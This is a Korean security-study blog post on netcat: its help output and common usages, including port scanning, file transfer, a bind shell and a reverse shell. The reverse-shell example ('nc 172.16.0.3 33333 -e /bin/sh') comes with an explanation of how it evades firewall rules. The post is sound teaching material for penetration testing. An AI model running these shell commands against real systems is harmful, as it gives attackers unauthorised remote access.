모의해킹 및 보안
Netcat
잉여토끼
2024. 10. 10. 12:33
netcat(nc) : TCP/UDP를 이용하여 네트워크 연결을읽거나 쓰는 명령줄 유틸리티
nc --help
Ncat 7.92 ( https://nmap.org/ncat )
Usage: ncat [options] [hostname] [port]
Options taking a time assume seconds. Append 'ms' for milliseconds,
's' for seconds, 'm' for minutes, or 'h' for hours (e.g. 500ms).
-4 Use IPv4 only
-6 Use IPv6 only
-U, --unixsock Use Unix domain sockets only
--vsock Use vsock sockets only
-C, --crlf Use CRLF for EOL sequence
-c, --sh-exec <command> Executes the given command via /bin/sh
-e, --exec <command> Executes the given command
--lua-exec <filename> Executes the given Lua script
-g hop1[,hop2,...] Loose source routing hop points (8 max)
-G <n> Loose source routing hop pointer (4, 8, 12, ...)
-m, --max-conns <n> Maximum <n> simultaneous connections
-h, --help Display this help screen
-d, --delay <time> Wait between read/writes
-o, --output <filename> Dump session data to a file
-x, --hex-dump <filename> Dump session data as hex to a file
-i, --idle-timeout <time> Idle read/write timeout
-p, --source-port port Specify source port to use
-s, --source addr Specify source address to use (doesn't affect -l)
-l, --listen Bind and listen for incoming connections
-k, --keep-open Accept multiple connections in listen mode
-n, --nodns Do not resolve hostnames via DNS
-t, --telnet Answer Telnet negotiations
-u, --udp Use UDP instead of default TCP
--sctp Use SCTP instead of default TCP
-v, --verbose Set verbosity level (can be used several times)
-w, --wait <time> Connect timeout
-z Zero-I/O mode, report connection status only
--append-output Append rather than clobber specified output files
--send-only Only send data, ignoring received; quit on EOF
--recv-only Only receive data, never send anything
--no-shutdown Continue half-duplex when receiving EOF on stdin
--allow Allow only given hosts to connect to Ncat
--allowfile A file of hosts allowed to connect to Ncat
--deny Deny given hosts from connecting to Ncat
--denyfile A file of hosts denied from connecting to Ncat
--broker Enable Ncat's connection brokering mode
--chat Start a simple Ncat chat server
--proxy <addr[:port]> Specify address of host to proxy through
--proxy-type <type> Specify proxy type ("http", "socks4", "socks5")
--proxy-auth <auth> Authenticate with HTTP or SOCKS proxy server
--proxy-dns <type> Specify where to resolve proxy destination
--ssl Connect or listen with SSL
--ssl-cert Specify SSL certificate file (PEM) for listening
--ssl-key Specify SSL private key (PEM) for listening
--ssl-verify Verify trust and domain name of certificates
--ssl-trustfile PEM file containing trusted SSL certificates
--ssl-ciphers Cipherlist containing SSL ciphers to use
--ssl-servername Request distinct server name (SNI)
--ssl-alpn ALPN protocol list to use
--version Display Ncat's version information and exit
주요 사용법
데이터 전송
#Server
nc -l [Listen Port] > [File Name]#Client
nc [Server IP] [Port] < [File Name]
HTTP 통신
#Client
printf "[HTTP Packet]" | nc [Server Domain or IP] 80
Bind Shell
#Server(피해자)
nv -lp [Port] -e [Shell]#Client(공격자)
nc [Server IP] [Port]
Reverse Shell
: 공격자가 접속 대기. 공격자가 클라이언트에 접속
일반적인 방화벽 규칙에 의하면 외부에서 내부로의 침투에 대한 규칙이 적용됨. 따라서 이를 반대로 피해자가 외부로 나가기 때문에 이를 우회 가능
#Server(공격자)
nc -lp [Port]
# nc -lp 33333#Client(피해자)
nc [Server IP] [Port] -e [Shell]
#nc 172.16.0.3 33333 -e /bin/sh
포트 스캐닝
#Client
nc -zv [Host IP] [Start Port]-[End Port]